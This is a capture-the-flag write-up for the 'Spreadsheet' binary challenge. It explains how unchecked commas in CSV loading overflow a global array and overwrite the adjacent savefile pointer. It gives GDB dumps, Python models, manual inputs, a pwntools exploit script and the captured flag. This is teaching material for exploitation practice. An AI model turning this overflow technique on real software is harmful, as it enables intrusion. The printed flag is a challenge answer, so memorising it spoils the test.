Flash CTF – Spreadsheet

Challenge Description

This program purports to be an Excel-like spreadsheet application. When run, the user is given a few options which operate largely as expected.

andrew@x1yoga:~$ ./spreadsheet.bin 
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > 

Printing the spreadsheet shows an empty sheet 10×10 in size.

Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > P
	A	B	C	D	E	F	G	H	I	J	
 1	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 2	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 3	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 4	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 5	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 6	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 7	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 8	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 9	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
10	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	

Editing the spreadsheet allows us to specify a cell and new value, which subsequently appears in the spreadsheet.

Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > E
Enter cell (i.e. 'B7'): A1
Enter new value: test
Value updated!

Saving and loading the spreadsheet also appear to work as one would expect, storing and retrieving any values that had been updated.

Some light reverse engineering reveals that the “spreadsheet” is stored as a 2D array of character pointers in the global data segment. We can see this in the print_spreadsheet() function, highlighted in yellow in Ghidra’s decompiler view.

The spreadsheet array is based at offset 0x4060 from the program base address. For instance, when run in GDB the spreadsheet array appears at address 0x0000555555558060. The spreadsheet appears to always be allocated with a fixed size of 10×10, meaning it occupies 10 * 10 * sizeof(char *) = 800 bytes of space in memory.

gef➤  hexdump byte &spreadsheet
0x0000555555558060 <spreadsheet+0000>    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x0000555555558070 <spreadsheet+0010>    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x0000555555558080 <spreadsheet+0020>    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x0000555555558090 <spreadsheet+0030>    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................

Further reverse engineering shows that the “load” and “save” mechanisms work by converting the spreadsheet contents to/from CSV format and storing them in the backing file spreadsheet.csv. We can see this in the save_spreadsheet() function, shown in Ghidra’s decompiler view.

The filename (spreadsheet.csv) is referenced through a global character pointer, savefile, at offset 0x4380. When run in GDB, the savefile pointer appears at address 0x555555558380 and holds the address of the filename string (0x5555555592a0 in this run).

gef➤  p savefile
$7 = 0x5555555592a0 "spreadsheet.csv"
gef➤  p &savefile
$8 = (char **) 0x555555558380 <savefile>
gef➤  hexdump byte &savefile
0x0000555555558380 <savefile+0000>    a0 92 55 55 55 55 00 00 00 00 00 00 00 00 00 00    ..UUUU..........
0x0000555555558390     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x00005555555583a0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0x00005555555583b0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................

Note that this means the savefile pointer sits immediately after, and contiguous with, the spreadsheet array: the array is 800 = 0x320 bytes long, and 0x4060 + 0x320 = 0x4380! This will soon be important!
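
The layout arithmetic can be checked with a few lines of Python. This is only a sketch built from the offsets and the GDB address quoted above; the variable names are made up for illustration, and the load base is derived from those numbers rather than read from the binary.

```python
POINTER_SIZE = 8              # sizeof(char *) on x86-64
ROWS, COLS = 10, 10

SPREADSHEET_OFFSET = 0x4060   # offset of the spreadsheet array (from the text)
SAVEFILE_OFFSET = 0x4380      # offset of the savefile pointer (from the text)
RUNTIME_SPREADSHEET = 0x0000555555558060  # address of spreadsheet seen in GDB

array_size = ROWS * COLS * POINTER_SIZE           # bytes occupied by the array
array_end = SPREADSHEET_OFFSET + array_size       # first byte past the array
load_base = RUNTIME_SPREADSHEET - SPREADSHEET_OFFSET
runtime_savefile = load_base + SAVEFILE_OFFSET

print(f"array size       : {array_size} bytes ({array_size:#x})")
print(f"end of array     : {array_end:#x}")
print(f"load base (GDB)  : {load_base:#x}")
print(f"savefile (GDB)   : {runtime_savefile:#x}")
print(f"contiguous       : {array_end == SAVEFILE_OFFSET}")
```

The computed runtime address of savefile matches the one GDB reports, which confirms there is no padding between the two globals.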

Vulnerability

A CSV injection vulnerability exists when saving/loading the spreadsheet contents, due to the lack of input validation for the comma (“,”) character. The user is allowed to enter new cell values containing commas, but when these values are written to the backing file, the result is a row that exceeds the expected number of columns.

andrew@x1yoga:~$ ./spreadsheet.bin 
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > E
Enter cell (i.e. 'B7'): J1
Enter new value: test,test,test
Value updated!
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > P
	A	B	C	D	E	F	G	H	I	J	
 1	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	test,test,test	
 2	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 3	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 4	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 5	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 6	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 7	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 8	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
 9	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
10	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	EMPTY	
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > S
Spreadsheet saved!
Options: (P)rint, (E)dit, (L)oad, (S)ave, (Q)uit
 > Q
Goodbye!
andrew@x1yoga:~$ cat spreadsheet.csv
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,test,test,test,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,
EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,EMPTY,

As we can see above, the saved CSV file contains a row with more than the expected 10 columns.
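
To make the effect concrete, here is a rough Python model of the save step. It is not the decompiled save_spreadsheet() logic; it simply assumes, based on the file contents shown above, that each cell is written verbatim followed by a comma. The function name save_rows is hypothetical.

```python
ROWS, COLS = 10, 10

def save_rows(sheet):
    """Serialize each row as its cell values, each followed by a comma.

    Assumption: no escaping or quoting is applied, as the saved file suggests.
    """
    return ["".join(f"{cell}," for cell in row) for row in sheet]

# Start from an empty sheet and edit cell J1, as in the session above.
sheet = [["EMPTY"] * COLS for _ in range(ROWS)]
sheet[0][9] = "test,test,test"

lines = save_rows(sheet)

# Count the comma-separated fields a reader of the file would see per row.
field_counts = [len(line.rstrip(",").split(",")) for line in lines]

print(lines[0])
print(field_counts)
```

The first row serializes to 12 fields while every other row has 10, which is exactly the malformed row seen in spreadsheet.csv.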

Further, the load_spreadsheet() function does not validate the number of columns before writing their values to memory. It reads each line of text with fgets(), splits it on the comma separator with strtok(), and writes each resulting value to spreadsheet[row][col], even if the number of columns exceeds the fixed row width of 10. This is the vulnerability. We can see this in the load_spreadsheet() function, as seen in the following Ghidra decompiler output.

This allows us to cause a global buffer overflow by:

  1. Editing a cell with a string containing many comma-separated values.
  2. Saving the spreadsheet
  3. Loading the spreadsheet

Specifically, each value parsed beyond the end of the 10×10 array causes an 8-byte character pointer to attacker-controlled data to be written past the array: the first extra value lands at offset 0 from the end of the array, the second at offset 8, and so on.
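
The out-of-bounds write can be modelled in Python with a flat list of pointer-sized slots. This is a sketch under several assumptions, not the program's actual code: slot 100 stands in for the savefile pointer, empty tokens are skipped the way strtok() skips them, the trailing newline is dropped, and at most 10 lines are read. The name load_rows is hypothetical.

```python
ROWS, COLS = 10, 10
POINTER_SIZE = 8
SAVEFILE_SLOT = ROWS * COLS   # first pointer-sized slot past the array

def load_rows(lines, memory):
    """Write every token to slot row*COLS + col, never checking col < COLS."""
    for row, line in enumerate(lines[:ROWS]):
        # Assumption: empty tokens are skipped and the newline is not kept.
        tokens = [t for t in line.rstrip("\n").split(",") if t]
        for col, token in enumerate(tokens):
            memory[row * COLS + col] = token   # the unchecked write

# 100 spreadsheet slots followed by one slot modelling the savefile pointer.
memory = ["EMPTY"] * (ROWS * COLS) + ["spreadsheet.csv"]

# Nine normal rows, then a last row carrying an 11th value.
csv_lines = ["EMPTY," * COLS + "\n"] * 9 + ["EMPTY," * 9 + "whatever,flag.txt,\n"]
load_rows(csv_lines, memory)

print(f"J10 slot      : {memory[SAVEFILE_SLOT - 1]}")
print(f"savefile slot : {memory[SAVEFILE_SLOT]}")
print(f"byte offset   : {SAVEFILE_SLOT * POINTER_SIZE:#x}")
```

Note that extra values in rows 1 through 9 only spill into the start of the next row, which is then overwritten when that row is loaded. In this model, only an overflow from the last row reaches memory beyond the array.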

Exploit

Looking back through our work, we are reminded that the savefile pointer is stored immediately after the spreadsheet array! This is especially convenient, because it means that the first char * we write beyond the end of the spreadsheet array will overwrite that pointer. This has the effect of altering the savefile value, allowing us to control the name of the file used in save/load operations.

Our exploit methodology then becomes clear:

  1. Edit cell J10 (at the end of the spreadsheet) with the string whatever,flag.txt.
  2. Save the spreadsheet, resulting in a CSV file with an erroneous 11th column in the 10th row.
  3. Load the spreadsheet, overwriting the savefile pointer with a pointer to flag.txt.
  4. Load the spreadsheet again, causing the program to read the contents of flag.txt into cell A1.
  5. Print the spreadsheet, leaking the flag!
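
The five steps can be dry-run against a small in-memory model before touching the real binary. Everything here is hypothetical scaffolding: the SheetModel class, the dict standing in for the filesystem, and the placeholder flag value are inventions for illustration, and the parsing assumptions (empty tokens skipped, newline dropped, at most 10 lines read) may not match the program exactly.

```python
ROWS, COLS = 10, 10

class SheetModel:
    """Toy model: 100 cell slots followed by one slot for the savefile name."""

    def __init__(self, files):
        self.files = files   # dict of filename -> contents (fake filesystem)
        self.slots = ["EMPTY"] * (ROWS * COLS) + ["spreadsheet.csv"]

    @property
    def savefile(self):
        return self.slots[ROWS * COLS]

    def edit(self, cell, value):
        col = ord(cell[0]) - ord("A")
        row = int(cell[1:]) - 1
        self.slots[row * COLS + col] = value

    def save(self):
        rows = (self.slots[r * COLS:(r + 1) * COLS] for r in range(ROWS))
        self.files[self.savefile] = "".join(
            "".join(f"{cell}," for cell in row) + "\n" for row in rows
        )

    def load(self):
        # The file is looked up once, before any slot is overwritten.
        lines = self.files[self.savefile].splitlines()[:ROWS]
        for row, line in enumerate(lines):
            for col, token in enumerate(t for t in line.split(",") if t):
                self.slots[row * COLS + col] = token   # no bound on col

files = {"flag.txt": "FLAG{placeholder}\n"}   # placeholder, not the real flag
model = SheetModel(files)

model.edit("J10", "whatever,flag.txt")   # step 1
model.save()                             # step 2
model.load()                             # step 3: savefile slot overwritten
name_after_first_load = model.savefile
model.load()                             # step 4: now reads flag.txt
leaked = model.slots[0]                  # step 5: cell A1

print(name_after_first_load, leaked)
```

The model shows why two loads are needed: the first load still reads spreadsheet.csv and only changes the filename, so the flag file is not opened until the second load.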

This can be done by hand using the following inputs:

E
J10
whatever,flag.txt
S
L
L
P

Or the flag can be obtained with the following Python script:

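import sys

from pwn import *

# Pick the target: a local process or a remote host/port
if len(sys.argv) < 2 or sys.argv[1] not in ("local", "remote"):
	print(f"Usage: {sys.argv[0]} <local|remote> [host] [port]")
	sys.exit(1)
elif sys.argv[1] == "local":
	p = process("./spreadsheet.bin")
elif sys.argv[1] == "remote":
	p = remote(sys.argv[2], int(sys.argv[3]))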

# Edit last cell, injecting 'flag.txt' in "11th" cell
p.sendline(b"E")
p.sendline(b"J10")
p.sendline(b"whatever,flag.txt")

# Save to backing file
p.sendline(b"S")

# Load the file, overwriting the backing file name in memory
p.sendline(b"L")

# Load the file again, reading from the flag.txt file!
p.sendline(b"L")

# Print out the spreadsheet and read the flag contents
p.sendline(b"P")
p.readuntil(b" 1\t")
flag = p.readuntil(b"\t")[:-1].decode()

print(f"Flag: {flag}")

p.close()

Running the script against the remote service prints the flag:

andrew@x1yoga:~$ python3 exploit.py remote localhost 5000
[+] Opening connection to localhost on port 5000: Done
Flag: MetaCTF{c0mm4_c0mm4_c0mm4_c0mma_c0mm4_ch4m3l30n}

[*] Closed connection to localhost port 5000